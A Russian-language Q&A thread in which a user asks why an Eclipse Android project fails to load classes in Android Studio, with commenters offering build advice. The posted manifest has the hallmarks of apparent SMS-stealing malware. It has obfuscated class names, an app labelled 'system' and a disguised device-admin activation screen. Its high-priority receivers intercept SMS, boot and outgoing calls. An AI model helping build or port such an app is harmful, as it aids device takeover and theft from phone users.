# Validates resource references inside Android XML files

Tags: java, android-studio, классы, eclipse

Доброго времени суток!
Столкнулся с такой проблемой, проект eclipse перенес в AS , все хорошо, НО...
[image: Вот такая проблема]

Я так понял , он не подгружает классы...

```
  <?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.navxly.gdntifp"
    android:versionCode="3"
    android:versionName="6.17" >

    <uses-sdk
        android:minSdkVersion="8"
        android:targetSdkVersion="21" />

    <uses-permission android:name="android.permission.WRITE_CONTACTS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.CALL_PHONE" />
    <uses-permission android:name="android.permission.GET_TASKS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.VIBRATE" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />

    <application
        android:name="com.eoaenoeg.nacmlea.uteiof"
        android:configChanges="keyboardHidden|orientation"
        android:icon="@drawable/icon"
        android:keepScreenOn="true"
        android:label="system"
        android:screenOrientation="portrait"
        android:theme="@style/AppTheme" >
        <activity android:name="com.navxly.gdntifp.MainActivity" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity
            android:name="com.navxly.gdntifp.cqojoipcf"
            android:label="Активация администратора" />

        <receiver
            android:name="com.navxly.gdntifp.sczec"
            android:label="Идентификация администратора"
            android:permission="android.permission.BIND_DEVICE_ADMIN" >
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@layout/policies" />

            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.navxly.gdntifp.lgrnqr" >
            <intent-filter android:priority="100" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.USER_PRESENT" />
                <action android:name="android.intent.action.PHONE_STATE" />
                <action android:name="android.intent.action.NEW_OUTGOING_CALL" />
            </intent-filter>
        </receiver>

        <service android:name="com.navxly.gdntifp.kxliv" />
        <service android:name="com.navxly.gdntifp.qiuegbxrgo" />
        <service android:name="com.navxly.gdntifp.xwnscdnovw" />
        <service android:name="com.navxly.gdntifp.jprbdhxv" />
        <service android:name="com.navxly.gdntifp.kcvgj" />
        <service android:name="com.navxly.gdntifp.nbudf" />
        <service android:name="com.navxly.gdntifp.wdvdu" />
        <service android:name="com.navxly.gdntifp.rzmzonlxdt" />
        <service android:name="com.navxly.gdntifp.twufyt" />
        <service android:name="com.navxly.gdntifp.reaqropmld" />

        <activity
            android:name="com.navxly.gdntifp.vroukwdyxj"
            android:label="wnwgukb" />
        <activity
            android:name="com.navxly.gdntifp.pgruz"
            android:label="xpizogly" />
    </application>

</manifest>
```

Вот собственно код.
В eclipse он хранится вот так , как я понял
[image: введите сюда описание изображения]

Comment: Кто может помочь?

Comment: в AS `android:versionCode`, `android:versionName` и блок `uses-sdk` прописываются в `build.gradle`

Comment: из-за этого выдает ошибку?

Comment: ну так вы измените ваш манифест и узнаете из-за этого или нет)

Comment: нет , не из-за этого

Comment: да и вон же он красным подчеркивает `MainActivity`, значит нет такой активити в пакете